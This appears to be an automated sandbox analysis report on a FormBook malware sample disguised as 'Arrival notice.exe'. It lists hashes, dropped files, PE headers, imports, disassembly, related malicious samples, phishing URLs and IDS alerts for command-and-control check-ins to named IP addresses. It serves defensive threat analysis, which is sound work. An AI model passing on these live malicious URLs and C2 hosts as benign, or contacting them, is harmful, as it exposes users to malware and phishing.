                                                                  -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                  • 162.213.249.216
                                                                  1.cmdGet hashmaliciousUnknownBrowse
                                                                  • 192.64.119.55
                                                                  COGENT-174USPURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • 38.47.232.144
                                                                  http://tiktok1api.goodpay.buzz/Get hashmaliciousUnknownBrowse
                                                                  • 154.39.150.40
                                                                  http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 38.91.45.7
                                                                  2qWIvXORVU.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 38.43.41.200
                                                                  na.elfGet hashmaliciousSliverBrowse
                                                                  • 38.55.193.31
                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.51.219.197
                                                                  PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                  • 38.240.41.28
                                                                  ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                  • 149.92.43.113
                                                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.162.177.151
                                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 149.52.168.147
                                                                  ARUBA-ASNITna.elfGet hashmaliciousMiraiBrowse
                                                                  • 31.14.139.69
                                                                  novo.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 95.110.195.186
                                                                  SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                  • 62.149.128.40
                                                                  https://h567268.linp067.arubabusiness.it/SI1892190290/amGet hashmaliciousUnknownBrowse
                                                                  • 80.88.87.86
                                                                  https://h567268.linp067.arubabusiness.it/SI1892190290/Get hashmaliciousUnknownBrowse
                                                                  • 80.88.87.86
                                                                  https://h567268.linp067.arubabusiness.it/BOKMANDOKL/am/infospage.phpGet hashmaliciousUnknownBrowse
                                                                  • 80.88.87.86
                                                                  https://terios.shop/Get hashmaliciousUnknownBrowse
                                                                  • 217.61.13.96
                                                                  w91DR2B3Pz.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 80.211.144.156
                                                                  List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 62.149.128.40
                                                                  Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 62.149.128.40

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\219X93M1i

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\mobsync.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1211596417522893
                                                                  Encrypted:false
                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                  MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                  SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                  SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                  SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\spiketop

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Arrival notice.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):288768
                                                                  Entropy (8bit):7.992362607736109
                                                                  Encrypted:true
                                                                  SSDEEP:6144:OBqFe4SoimNekhuDuZKs+aaSL9rFTRKOA2ArGNwFk7RN7ssQRK:nSlAekQ3spaSRJMOA2AriFRNoXK
                                                                  MD5:7C8F8F1F1A531DDA873E8B7FDCAA03D5
                                                                  SHA1:772BFFB2770FC3A9D291816C7DA4A670565265BB
                                                                  SHA-256:E2917EE54C69F4F0C1C016EA3B03CB0621FF3284626422143A9DD8AAF0F59893
                                                                  SHA-512:5944CD5626B6C4356E9CA78C1D28FCA38B3E34EABECEBC79AA5A9A4ED1F9052A297BEE51D4CBB43CB4E8898D608D703D9C6344B6EA5748B9CB8007ABE4436221
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.h.j.T96L...S..f.S;....OR...091XZ2S89T96LZD2Z091XZ2S89T96L.D2Z>&.VZ.Z...8z.{.Z3C.A*5U!YTtZW"4+FzR\.*/\sQWt}y.z)]>U.<UP.S89T96L#E;..YV.gR4..4^.V...`P^.B....Y3.,...:W.c19ZnX^.96LZD2Z0itXZ~R99.5..ZD2Z091X.2Q92U26L.@2Z091XZ2S.*T96\ZD2*491X.2S(9T94LZB2Z091XZ4S89T96LZ46Z0;1XZ2S8;Ty.LZT2Z 91XZ"S8)T96LZD"Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T9.8?<FZ09..^2S(9T9`HZD"Z091XZ2S89T96LzD2:091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z091XZ2S89T96LZD2Z0

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.55172829743465
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                  • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Arrival notice.exe
                                                                  File size:1'401'539 bytes
                                                                  MD5:50397bfab2624cccb8c7ae8ce667048c
                                                                  SHA1:719db4c99ee56ff658a1b477e589dffbc37fa582
                                                                  SHA256:ebd5341fb10c3fd26e72d2664961d062bdd4982fe95c327a32aeb4784742e9d8
                                                                  SHA512:95fb98f1ccd3678fa63a480ac527a7ceaf21d5a115fce6f1fdcae48fc0c87d87196d91c4e6a00c3407cb1061f0c94ea50bc372758731d09495c30796b1d49dab
                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLGND+4ardQOHeT2T9iwXF1y/WxEh67:f3v+7/5QL+dar6EeTan114Sm67
                                                                  TLSH:5355F212B7D680B2D9A338B0293BE327EB3575190327C49BA7E52E778F211509B37761
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                  File Icon

                                                                  Icon Hash:1733312925935517

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x416310
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007FF3B46F15DCh
                                                                  jmp 00007FF3B46E53AEh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                  mov ecx, dword ptr [ebp+10h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007FF3B46E553Ah
                                                                  cmp edi, eax
                                                                  jc 00007FF3B46E56DAh
                                                                  cmp ecx, 00000100h
                                                                  jc 00007FF3B46E5551h
                                                                  cmp dword ptr [004A94E0h], 00000000h
                                                                  je 00007FF3B46E5548h
                                                                  push edi
                                                                  push esi
                                                                  and edi, 0Fh
                                                                  and esi, 0Fh
                                                                  cmp edi, esi
                                                                  pop esi
                                                                  pop edi
                                                                  jne 00007FF3B46E553Ah
                                                                  pop esi
                                                                  pop edi
                                                                  pop ebp
                                                                  jmp 00007FF3B46E599Ah
                                                                  test edi, 00000003h
                                                                  jne 00007FF3B46E5547h
                                                                  shr ecx, 02h
                                                                  and edx, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007FF3B46E555Ch
                                                                  rep movsd
                                                                  jmp dword ptr [00416494h+edx*4]
                                                                  nop
                                                                  mov eax, edi
                                                                  mov edx, 00000003h
                                                                  sub ecx, 04h
                                                                  jc 00007FF3B46E553Eh
                                                                  and eax, 03h
                                                                  add ecx, eax
                                                                  jmp dword ptr [004163A8h+eax*4]
                                                                  jmp dword ptr [004164A4h+ecx*4]
                                                                  nop
                                                                  jmp dword ptr [00416428h+ecx*4]
                                                                  nop
                                                                  mov eax, E4004163h
                                                                  arpl word ptr [ecx+00h], ax
                                                                  or byte ptr [ecx+eax*2+00h], ah
                                                                  and edx, ecx
                                                                  mov al, byte ptr [esi]
                                                                  mov byte ptr [edi], al
                                                                  mov al, byte ptr [esi+01h]
                                                                  mov byte ptr [edi+01h], al
                                                                  mov al, byte ptr [esi+02h]
                                                                  shr ecx, 02h
                                                                  mov byte ptr [edi+02h], al
                                                                  add esi, 03h
                                                                  add edi, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007FF3B46E54FEh

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ASM] VS2008 SP1 build 30729
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [C++] VS2008 SP1 build 30729
                                                                  • [ C ] VS2005 build 50727
                                                                  • [IMP] VS2005 build 50727
                                                                  • [ASM] VS2008 build 21022
                                                                  • [RES] VS2008 build 21022
                                                                  • [LNK] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                  RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                  RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                  RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                  RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                  RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                  RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                  Imports

                                                                  DLLImport
                                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                  GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                  OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-10-07T10:38:24.034900+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104997676.223.105.23080TCP
                                                                  2024-10-07T10:38:40.234348+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997765.21.196.9080TCP
                                                                  2024-10-07T10:38:42.784111+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997865.21.196.9080TCP
                                                                  2024-10-07T10:38:45.357708+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997965.21.196.9080TCP
                                                                  2024-10-07T10:38:48.458941+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104998065.21.196.9080TCP
                                                                  2024-10-07T10:38:54.248351+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049981162.0.238.24680TCP
                                                                  2024-10-07T10:38:57.755804+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049982162.0.238.24680TCP
                                                                  2024-10-07T10:38:59.405237+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049983162.0.238.24680TCP
                                                                  2024-10-07T10:39:02.300481+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049984162.0.238.24680TCP
                                                                  2024-10-07T10:39:10.093055+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998546.17.172.4980TCP
                                                                  2024-10-07T10:39:12.676381+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998646.17.172.4980TCP
                                                                  2024-10-07T10:39:15.263845+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998746.17.172.4980TCP
                                                                  2024-10-07T10:39:17.791894+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104998846.17.172.4980TCP
                                                                  2024-10-07T10:39:23.554267+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998962.149.128.4080TCP
                                                                  2024-10-07T10:39:26.122566+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999062.149.128.4080TCP
                                                                  2024-10-07T10:39:28.656511+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999162.149.128.4080TCP
                                                                  2024-10-07T10:39:31.200575+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104999262.149.128.4080TCP
                                                                  2024-10-07T10:39:45.159373+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999345.130.41.1380TCP
                                                                  2024-10-07T10:39:47.713671+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999445.130.41.1380TCP
